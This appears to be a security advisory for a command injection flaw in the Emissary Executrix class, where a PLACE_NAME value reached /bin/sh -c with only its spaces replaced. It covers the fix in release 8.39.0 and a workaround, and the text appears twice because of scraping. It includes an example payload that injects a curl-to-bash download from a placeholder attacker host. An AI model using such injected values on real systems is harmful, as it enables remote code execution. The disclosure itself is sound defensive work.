Summary
The Executrix utility class constructed shell commands by concatenating
configuration-derived values — including the PLACE_NAME parameter — with
insufficient sanitization. Only spaces were replaced with underscores, allowing
shell metacharacters (;, |, $, `, (, ), etc.) to pass through
into /bin/sh -c command execution.
Details
Vulnerable code — Executrix.java
Insufficient sanitization (line 132):
this.placeName = this.placeName.replace(' ', '_');
// ONLY replaces spaces — shell metacharacters pass throughShell sink (line 1052–1058):
protected String[] getTimedCommand(final String c) {
return new String[] {"/bin/sh", "-c", "ulimit -c 0; cd " + tmpNames[DIR] + "; " + c};
}Data flow
PLACE_NAME is read from a configuration fileExecutrix applies only a space-to-underscore replacement- The
placeName is used to construct temporary directory paths (tmpNames[DIR])
tmpNames[DIR] is concatenated into a shell command string- The command is executed via
/bin/sh -c
Example payload
PLACE_NAME = "test;curl attacker.com/shell.sh|bash;x"
After the original sanitization: test;curl_attacker.com/shell.sh|bash;x
(semicolons, pipes, and other metacharacters preserved)
Impact
- Arbitrary command execution on the Emissary host
- Requires the ability to control configuration values (e.g., administrative
access or a compromised configuration source)
Remediation
Fixed in PR #1290,
merged into release 8.39.0.
The space-only replacement was replaced with an allowlist regex that strips all
characters not matching [a-zA-Z0-9_-]:
protected static final Pattern INVALID_PLACE_NAME_CHARS = Pattern.compile("[^a-zA-Z0-9_-]");
protected static String cleanPlaceName(final String placeName) {
return INVALID_PLACE_NAME_CHARS.matcher(placeName).replaceAll("_");
}This ensures that any shell metacharacter in the PLACE_NAME configuration
value is replaced with an underscore before it can reach a command string.
Tests were added to verify that parentheses, slashes, dots, hash, dollar signs,
backslashes, quotes, semicolons, carets, and at-signs are all sanitized.
Workarounds
If upgrading is not immediately possible, ensure that PLACE_NAME values in all
configuration files contain only alphanumeric characters, underscores, and hyphens.
References
References
BrennanTM Reporter
Summary
The
Executrixutility class constructed shell commands by concatenatingconfiguration-derived values — including the
PLACE_NAMEparameter — withinsufficient sanitization. Only spaces were replaced with underscores, allowing
shell metacharacters (
;,|,$,`,(,), etc.) to pass throughinto
/bin/sh -ccommand execution.Details
Vulnerable code —
Executrix.javaInsufficient sanitization (line 132):
Shell sink (line 1052–1058):
Data flow
PLACE_NAMEis read from a configuration fileExecutrixapplies only a space-to-underscore replacementplaceNameis used to construct temporary directory paths (tmpNames[DIR])tmpNames[DIR]is concatenated into a shell command string/bin/sh -cExample payload
After the original sanitization:
test;curl_attacker.com/shell.sh|bash;x(semicolons, pipes, and other metacharacters preserved)
Impact
access or a compromised configuration source)
Remediation
Fixed in PR #1290,
merged into release 8.39.0.
The space-only replacement was replaced with an allowlist regex that strips all
characters not matching
[a-zA-Z0-9_-]:This ensures that any shell metacharacter in the
PLACE_NAMEconfigurationvalue is replaced with an underscore before it can reach a command string.
Tests were added to verify that parentheses, slashes, dots, hash, dollar signs,
backslashes, quotes, semicolons, carets, and at-signs are all sanitized.
Workarounds
If upgrading is not immediately possible, ensure that
PLACE_NAMEvalues in allconfiguration files contain only alphanumeric characters, underscores, and hyphens.
References
References